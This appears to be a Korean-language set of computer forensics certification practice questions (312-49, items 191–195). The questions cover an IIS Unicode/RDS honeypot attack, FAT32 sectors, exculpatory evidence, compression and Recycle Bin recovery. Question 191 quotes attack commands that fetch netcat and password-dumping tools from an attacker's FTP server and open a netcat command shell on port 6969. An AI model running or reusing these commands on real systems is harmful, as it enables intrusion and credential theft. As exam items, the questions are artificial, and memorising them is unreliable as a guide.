312-49 문제 191

다음 발췌문은 lab.wiretrip.net에서 호스팅된 허니팟 로그에서 가져온 것입니다. Snort는 213.116.251.162 IP 주소에서 유니코드 공격이 발생했다고 보고했습니다. 파일 권한 정규화 취약점(유니코드 공격)을 이용하면 일반적으로 스크립트 실행 권한이 없는 임의의 폴더에서도 스크립트를 실행할 수 있습니다. 공격자는 유니코드 공격을 시도하여 결국 boot.ini 파일을 표시하는 데 성공했습니다.
그다음 그는 msadcs.dll을 통해 RDS를 조작하는 것으로 넘어갑니다. RDS 취약점을 이용하면 악의적인 사용자가 IIS 서버에서 셸 명령(예: CMD.EXE)을 실행하는 SQL 문을 구성할 수 있습니다. 그는 간단한 쿼리를 통해 디렉터리가 존재하는지 확인하고, msadcs.dll에 대한 쿼리를 통해 해당 파일이 정상적으로 작동하는 것을 확인합니다.
공격자는 RDS 쿼리를 실행하고, 그 결과 아래와 같은 명령이 실행됩니다.
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo quit >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"
주어진 취약점을 통해 무엇을 추론할 수 있습니까?

312-49 문제 192

FAT32 시스템에서 123KB 파일은 몇 개의 섹터를 사용합니까?

312-49 문제 193

수사 과정에서 피의자의 무죄를 입증할 수 있는 증거를 발견하게 됩니다. 이때, 편견 없는 객관적인 시각을 유지하고 사실 확인 과정 전반에 걸쳐 공정해야 합니다. 따라서 이러한 증거를 보고해야 합니다. 이러한 유형의 증거는 다음과 같이 알려져 있습니다.

312-49 문제 194

높은 압축률이 중요하지만 데이터 손실은 걱정할 필요가 없다면 어떤 유형의 압축 방식을 사용하시겠습니까?

312-49 문제 195

휴지통을 비운 파일도 여전히 복구할 수 있는 이유는 무엇일까요?
윈도우 컴퓨터인가요?